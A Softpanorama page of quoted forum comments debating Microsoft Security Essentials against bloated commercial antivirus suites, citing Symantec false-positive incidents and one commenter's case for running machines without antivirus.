    Why would MS work to put AV companies out of business? The reason for MSE is plain: they're embarrassed about the (deserved) reputation of their past OSes in terms of security and needed to address it. These bloated AV programs like Symantec's suite were also bogging down the systems of people who use Windows, which makes Windows seem slow as well. In the end, it was a smart move to get in there and provide an AV that was both useful and mostly unobtrusive. This isn't the browser wars where MS was working to elbow out Netscape in a new area of software; AV companies have had years to make money and get it right and have instead written an expensive, and bloated product in almost all cases.

    Charliemopps (1157495)

    Yes, I'm ashamed to say MSE works really well. I'd argue its because Microsoft has access to their own source-code and knows where they screwed up... but whatever... it's the best AV I've used, and I've used them all.

    TheLink (130905)
    I'd argue its because Microsoft has access to their own source-code

    I doubt that's the real reason, because both Norton and McAfee used to be good. Then they started to be bigger resource hogs than most viruses they were protecting you against (yes there's other evil stuff that viruses do but keep reading...).

    I definitely recall Norton/Symantec making systems more unstable or causing problems:

    1) Years ago someone had problems fetching email, turns out Norton/Symantec was intercepting the POP3 connections to scan for viruses (ok fine), but some email was causing it to _crash_ (extremely not fine- especially if it turns out to be an exploitable code-injection bug).

    2) In 2007: []

    A virus-signature update delivered automatically to users on Friday about 1:00 a.m. Beijing time to Symantec's antivirus scanning engine mistook two critical system files of the Simplified Chinese edition of Windows XP Service Pack 2 for a Trojan horse. The two files -- netapi32.dll and lsasrv.dll -- were falsely quarantined, which in turn crippled Windows. If an affected PC was rebooted, Windows failed on start-up and showed only a blue screen.

    3) On 28 January 2010, Symantec's antivirus software marked Spotify as a Trojan horse, disabling the software across millions of computers

    Nowadays depending on the situation I use Avira, MSE or "no antivirus". My personal home machine has no AV installed. My browser runs as a different user process. If I have something that I think is suspicious, I check it with VirusTotal ( [] ). So far I have had no problems doing things this way, so I don't see the point of constantly incurring the extra CPU/resource costs by installing a real-time virus scanner on my machine. For the past few decades my personal machines have never been infected by a virus. I may have downloaded viruses or malware, but I have not been infected by them. And yes I do know how to check.

    A dedicated attacker might be able to put malware on my machine, but they'd know how to use virustotal or similar too, and still be able to plant malware on my machine even if I was running AV software (and wasting resources).

    The machine my parents use on the other hand has AV software installed (not Symantec, nor McAfee).

    AV software is not needed everywhere and in some cases if installed, it indicates someone is doing something wrong: []

    Given my track record vs Symantec's track record, I would prefer to take the bet that Symantec is more likely to screw up my system than a virus. There have been other antivirus vendors with similar screw ups too.

    On a related note, Trend screwed up notoriously - albeit with its antispam product, blocking the letter "p".

    For these reasons production servers and other important machines that are well secured and managed should NOT have antivirus software installed.

    If they are so poorly managed that the operators are much more likely to screw up than the AV vendors, then sure, install AV, but that means you are doing something wrong.

    Recommended Links

    Google matched content

    Softpanorama Recommended

    Top articles





    Groupthink : Two Party System as Polyarchy : Corruption of Regulators : Bureaucracies : Understanding Micromanagers and Control Freaks : Toxic Managers :   Harvard Mafia : Diplomatic Communication : Surviving a Bad Performance Review : Insufficient Retirement Funds as Immanent Problem of Neoliberal Regime : PseudoScience : Who Rules America : Neoliberalism  : The Iron Law of Oligarchy : Libertarian Philosophy


    War and Peace : Skeptical Finance : John Kenneth Galbraith :Talleyrand : Oscar Wilde : Otto Von Bismarck : Keynes : George Carlin : Skeptics : Propaganda  : SE quotes : Language Design and Programming Quotes : Random IT-related quotesSomerset Maugham : Marcus Aurelius : Kurt Vonnegut : Eric Hoffer : Winston Churchill : Napoleon Bonaparte : Ambrose BierceBernard Shaw : Mark Twain Quotes


    Vol 25, No.12 (December, 2013) Rational Fools vs. Efficient Crooks The efficient markets hypothesis : Political Skeptic Bulletin, 2013 : Unemployment Bulletin, 2010 :  Vol 23, No.10 (October, 2011) An observation about corporate security departments : Slightly Skeptical Euromaydan Chronicles, June 2014 : Greenspan legacy bulletin, 2008 : Vol 25, No.10 (October, 2013) Cryptolocker Trojan (Win32/Crilock.A) : Vol 25, No.08 (August, 2013) Cloud providers as intelligence collection hubs : Financial Humor Bulletin, 2010 : Inequality Bulletin, 2009 : Financial Humor Bulletin, 2008 : Copyleft Problems Bulletin, 2004 : Financial Humor Bulletin, 2011 : Energy Bulletin, 2010 : Malware Protection Bulletin, 2010 : Vol 26, No.1 (January, 2013) Object-Oriented Cult : Political Skeptic Bulletin, 2011 : Vol 23, No.11 (November, 2011) Softpanorama classification of sysadmin horror stories : Vol 25, No.05 (May, 2013) Corporate bullshit as a communication method  : Vol 25, No.06 (June, 2013) A Note on the Relationship of Brooks Law and Conway Law


    Fifty glorious years (1950-2000): the triumph of the US computer engineering : Donald Knuth : TAoCP and its Influence of Computer Science : Richard Stallman : Linus Torvalds  : Larry Wall  : John K. Ousterhout : CTSS : Multix OS Unix History : Unix shell history : VI editor : History of pipes concept : Solaris : MS DOSProgramming Languages History : PL/1 : Simula 67 : C : History of GCC developmentScripting Languages : Perl history   : OS History : Mail : DNS : SSH : CPU Instruction Sets : SPARC systems 1987-2006 : Norton Commander : Norton Utilities : Norton Ghost : Frontpage history : Malware Defense History : GNU Screen : OSS early history

    Classic books:

    The Peter Principle : Parkinson Law : 1984 : The Mythical Man-MonthHow to Solve It by George Polya : The Art of Computer Programming : The Elements of Programming Style : The Unix Hater’s Handbook : The Jargon file : The True Believer : Programming Pearls : The Good Soldier Svejk : The Power Elite

    Most popular humor pages:

    Manifest of the Softpanorama IT Slacker Society : Ten Commandments of the IT Slackers Society : Computer Humor Collection : BSD Logo Story : The Cuckoo's Egg : IT Slang : C++ Humor : ARE YOU A BBS ADDICT? : The Perl Purity Test : Object oriented programmers of all nations : Financial Humor : Financial Humor Bulletin, 2008 : Financial Humor Bulletin, 2010 : The Most Comprehensive Collection of Editor-related Humor : Programming Language Humor : Goldman Sachs related humor : Greenspan humor : C Humor : Scripting Humor : Real Programmers Humor : Web Humor : GPL-related Humor : OFM Humor : Politically Incorrect Humor : IDS Humor : "Linux Sucks" Humor : Russian Musical Humor : Best Russian Programmer Humor : Microsoft plans to buy Catholic Church : Richard Stallman Related Humor : Admin Humor : Perl-related Humor : Linus Torvalds Related humor : PseudoScience Related Humor : Networking Humor : Shell Humor : Financial Humor Bulletin, 2011 : Financial Humor Bulletin, 2012 : Financial Humor Bulletin, 2013 : Java Humor : Software Engineering Humor : Sun Solaris Related Humor : Education Humor : IBM Humor : Assembler-related Humor : VIM Humor : Computer Viruses Humor : Bright tomorrow is rescheduled to a day after tomorrow : Classic Computer Humor

    The Last but not Least Technology is dominated by two types of people: those who understand what they do not manage and those who manage what they do not understand ~Archibald Putt. Ph.D

    Copyright © 1996-2020 by Softpanorama Society. was initially created as a service to the (now defunct) UN Sustainable Development Networking Programme (SDNP) in the author free time and without any remuneration. This document is an industrial compilation designed and created exclusively for educational use and is distributed under the Softpanorama Content License. Original materials copyright belong to respective owners. Quotes are made for educational purposes only in compliance with the fair use doctrine.

    FAIR USE NOTICE This site contains copyrighted material the use of which has not always been specifically authorized by the copyright owner. We are making such material available to advance understanding of computer science, IT technology, economic, scientific, and social issues. We believe this constitutes a 'fair use' of any such copyrighted material as provided by section 107 of the US Copyright Law according to which such material can be distributed without profit exclusively for research and educational purposes.

    This is a Spartan WHYFF (We Help You For Free) site written by people for whom English is not a native language. Grammar and spelling errors should be expected. The site contain some broken links as it develops like a living tree...

    You can use PayPal to make a contribution, supporting development of this site and speed up access. In case is down you can use the at


    The statements, views and opinions presented on this web page are those of the author (or referenced source) and are not endorsed by, nor do they necessarily reflect, the opinions of the author present and former employers, SDNP or any other organization the author may be associated with. We do not warrant the correctness of the information provided or its fitness for any purpose. The site uses AdSense so you need to be aware of Google privacy policy. You you do not want to be tracked by Google please disable Javascript for this site. This site is perfectly usable without Javascript.

    Last modified: March, 12, 2019